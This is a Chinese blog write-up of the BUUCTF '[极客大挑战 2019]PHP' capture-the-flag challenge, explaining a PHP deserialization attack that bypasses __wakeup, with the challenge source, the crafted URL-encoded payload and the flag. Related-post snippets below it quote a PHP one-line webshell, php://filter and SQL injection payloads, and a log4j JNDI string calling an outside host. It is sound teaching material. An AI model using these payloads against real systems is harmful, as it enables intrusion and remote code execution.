BUU-WEB-[极客大挑战 2019]PHP

最新推荐文章于 2023-09-16 17:14:24 发布
最新推荐文章于 2023-09-16 17:14:24 发布
阅读量492 收藏
点赞数
分类专栏: BUU-WEB
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_24033605/article/details/116565780
版权

[极客大挑战 2019]PHP

查看源码没有任何提示,于是爆破一下,看有没有其他子页面。结果爆破出一个www.zip的备份压缩包。
在这里插入图片描述
flag.php源码:

<?php
$flag = 'Syc{dog_dog_dog_dog}';
?>

(可惜,这不是flag)
index.php部分源码:

 <?php
    include 'class.php';
    $select = $_GET['select'];
    $res=unserialize(@$select);
    ?>

这里select用了get提交方式,并且做了一次反序列化。
class.php源码:

<?php
include 'flag.php';


error_reporting(0);


class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();

            
        }
    }
}
?>

从这段源码中可以看出我们要构建的password为100,username为admin,才可以获取flag。
尝试构建序列化字符串

<?php
class Name
{
    private $username = 'admin';
    private $password = '100';
}
$a = new Name();
echo urlencode(serialize($a))
?>

//未编码的payload
O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}
//private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化时,类名和字段名前面都会加上\0的前缀。字符串长度也包括所加前缀的长度
O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
//url编码的payload
O:4:%22Name%22:3:{s:14:%22%00Name%00username%22;s:5:%22admin%22;s:14:%22%00Name%00password%22;i:100;}

构建payload为:

?select=O:4:%22Name%22:3:{s:14:%22%00Name%00username%22;s:5:%22admin%22;s:14:%22%00Name%00password%22;i:100;}

在这里插入图片描述

flag{4c823c6c-a3a6-41ee-ae01-acaa7ec7c9fe}
TzZzEZ-web
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
05-26
在"BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)"这个挑战中,参赛者需要对名为"easywasm.wasm"的WASM文件进行逆向工程,理解其内部逻辑并可能找到隐藏的漏洞或解决方案。 WASM的主要特点包括: 1...
BUU刷题-Reveser-FlareOn5-Web2.0(WebAssembly逆向分析)
最新发布
05-26
在本题目中,我们面临的是一个关于WebAssembly(简称WASM)逆向分析的挑战,源自FlareOn5赛事的Web2.0关卡。WebAssembly是一种低级虚拟机指令集,它允许开发者以接近原生的速度运行用C、C++或Rust等语言编译的代码。...
BUU WEB [ACTF2020 新生赛]Include
star_feather的博客
01-17 404
题目很直接,名字就叫include,所以直接猜测这是道文件包含的题目。打开网址,有一个提示,点开后有一句话: 这里也可以看到,这就是一个文件包含得题目。因为没有任何其他提示,而且一般存放flag的文件flag.php里也只有这一句明显不是flag话, ...
BUU 文件包含漏洞-[ACTF2020 新生赛]Include
Ivyyyyyy1的博客
10-16 2108
一、题目 这里看两个页面的源代码都没有线索 回到题目Include 加之url里有 /?file=flag.php 容易想到文件包含漏洞 二、解题 1. php:// 用来访问输入输出流,有两个常用的子协议 (1)php://filter 用来过滤筛选文件 php语法文件被include成功时,可直接执行命令,而非php语法文件被include失败时,会直接输出源码内容 因此我们可以先通过base64编码的方法传入include()函数,这样在不会被识别为p...
buu web:Include(文件包含)
m0_55378150的博客
03-28 817
打开靶场 有一个小tip,打开看一下 发现它的url是这样的,是不是很像warm up的文件包含? 结合题目名字Include, 我敢肯定就是文件包含(滑稽),而且它给出了flag.php,但是没有直接显示flag,可能被隐藏了,所以用php伪协议(关于伪协议可以看一下这篇文章https://segmentfault.com/a/1190000018991087)(我也不会,照猫画虎)读取一下flag.php,payload为?file=php://filter/read=convert.
buu actf新生赛 include
qq_55777983的博客
08-21 275
前言 buu的actf新生赛相对来说要简单很多,容易上手。但是做出来的人怎么没[强网杯 2019]随便注的人多。。。我觉得这题比actf新生赛的题目难好多。 让我不解 正文 根据题目,我们知道这是一题文件包含 进入题目,发现第一页只有一个tips的链接 点击进入,发现url中有了文件包含 我们使用php伪协议进行读取flag.php文件 ?file=php://filter/read=convert.base64-encode/resource=flag.php 返回了一串密文,看着像是base64,后面
BUU CTF web(三)
0xdawn的博客
04-30 7315
[WesternCTF2018]shrine import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shr...
Buuctf-Web-[极客挑战 2019]EasySQL 1 题解及思路总结
m0_62239233的博客
09-16 8588
SQL注入。
BUUCTF-Web】 [极客挑战 2019]PHP
RexHa的博客
09-04 734
BUUCTF-Web】 [极客挑战 2019]PHP
BUU-WEB-[极客挑战 2019]Upload
qq_24033605的博客
05-09 182
[极客挑战 2019]Upload 简单说一下思路,从题目看出来是文件上传漏洞,利用一句话木马使用蚁剑或者菜刀连接。 一句话木马为: GIF89a? <script language="php">eval($_REQUEST[shell])</script> 文件后缀名为phtml 上传的时候修改文件属性。 找到上传的网页,利用工具连接。 成功连接,打开终端搜寻flag。 flag{69a6b539-77e8-49a3-bad7-7187d1541c59} ...
BUU CTF---[极客挑战 2019]PHP 1
weixin_46685211的博客
05-04 810
文章目录知识点一、备份网站二、代码审计1._wakeup()魔术方法2.GET方法3.类代码4.构造对象参考资料 知识点 1、PHP反序列化 2、绕过魔术方法 __wakeup() 一、备份网站 查看界面,提示备份网站。则搜索下载网站的备份文件。写一个程序遍历常见的备份文件网址,发现其中/www,zip的response为200 import requests url = "url地址" l1 = ['web', 'website', 'backup', 'back', 'www', 'wwwroot
POSN:POSN-BUU的源代码
04-01
POSN-BUU可能是该系统的一个特定实现或者模块,主要用于处理BUU(Base Unit Unit,基本单元)相关的定位任务。这个源代码是用C++编程语言编写的,C++是一种通用且高效的编程语言,特别适合开发对性能要求高的系统...
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
1ncrd#Study-Record#BUUCTF[第二章 web进阶]XSS闯关1.md
08-10
一些关于xss的payload
BUU-WEB-[HCTF 2018]admin
qq_24033605的博客
05-09 7364
[HCTF 2018]admin方法一:flask session欺骗方法二:Unicode欺骗 主页标题有一个超链接,点击去看一看。 啥也没找到,于是返回主页查看源码。发现一个登录的链接和一个注册的链接。 尝试先注册一个测试账号。 注释里提示我们没用admin账户登录。 查看源码,发现提供了四个操作的链接。 想要获取admin的账户,只可能是从两个方面入手,一个是注册时修改admin密码,另一个就是通过修改密码,修改admin的密码。 change功能里的源码中,提供了一个github地址。
BUUCTF-[SCTF2019]Flag Shop
qq_24033605的博客
11-04 4333
[SCTF2019]Flag Shop 简单看一下几个按钮的作用,buy flag是购买flag的按钮,但是当前的JinKela不够买不起,reset是重置按钮,work是工作按钮,可以赚取JinKela,但是每次只能赚取一小部分。(除非你足够闲,一直点到所需的数量然后购买flag) 这三个按钮干不成大事,目录扫描,扫到robots.txt 查看页面备份文件 这里可以看到源码~~(本菜狗没学过Ruby,哭了)~~ 问题不大,看到了JWT,先抓个包看一下, 找到了jkl的位置,但是缺少密钥对其进行加
BUUCTF-[MRCTF2020]Ezaudit
qq_24033605的博客
11-04 3248
[MRCTF2020]Ezaudit 扫描目录,发现www.zip可以下载到源码。 进行部分审计, 只有当username,password和private_key全部正确时,才会获取flag。 对于username和password,由于是sql查询,可以万能密码进行绕过,剩下的问题是获取private_key。 给出了获取public_key和private_key的函数,并且mt_rand函数是伪随机函数,只要获取种子值就都不是问题。 接下来我们要根据public_key反推出种子值。 首先转换字
BUUCTF-[b01lers2020]Life on Mars
qq_24033605的博客
11-04 2936
[b01lers2020]Life on Mars 审视了一下页面的功能,这几个功能键只能改变页面显示,连跳转都没有。扫描了一下,没有其他任何页面。这是猜想是不是框架漏洞。 利用了Bootstrap的漏洞也没用,只能抓包看一下,不抓不知道,一抓吓一跳 找到了sql注入的注入点,测试了一下,似乎存在waf,不能有空格,于是常规用/**/替换空格。 爆破数据库名 union/**/select/**/1,group_concat(SCHEMA_NAME)/**/from/**/information_s
[长安杯]web-shiro复现
qq_24033605的博客
01-12 2220
长安杯-shiro?复现 浏览器显示是springboot框架 登录伪造shiro,关键词为remeber-me shiro直接打,打不进去 springboot还可以写log4j漏洞,测试一下 jndi被过滤了 进行绕过 ${${::-j}ndi:rmi://py2hu7.ceye.io/exp} 成功接收到dnslog信息。 构建jndi反弹shell,这里反弹shell的命令需要bypass一下 在这里插入代码片 反弹的有点慢,但是可以成功反弹shell并拿取flag。 ...
buu Quoted-printable
09-13
Quoted-printable是一种编码方法,常用于电子邮件中的MIME编码。它的作用是将非ASCII字符转换为可打印的ASCII字符。在Quoted-printable编码中,使用"="符号后跟两个十六进制数字来表示原本的字符。 在解密Quoted-printable编码时,我们可以使用在线工具来帮助我们。一个可以使用的工具是[mxcz.net](http://www.mxcz.net/tools/QuotedPrintable.aspx)。 根据提供的信息,得到的flag是"flag{那你也很棒哦}"。 总结:Quoted-printable是一种常见的邮件编码方法,用于将非ASCII字符转换为可打印的ASCII字符。解密Quoted-printable编码可以使用在线工具,如[mxcz.net](http://www.mxcz.net/tools/QuotedPrintable.aspx)。根据提供的信息,得到的flag是"flag{那你也很棒哦}"。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值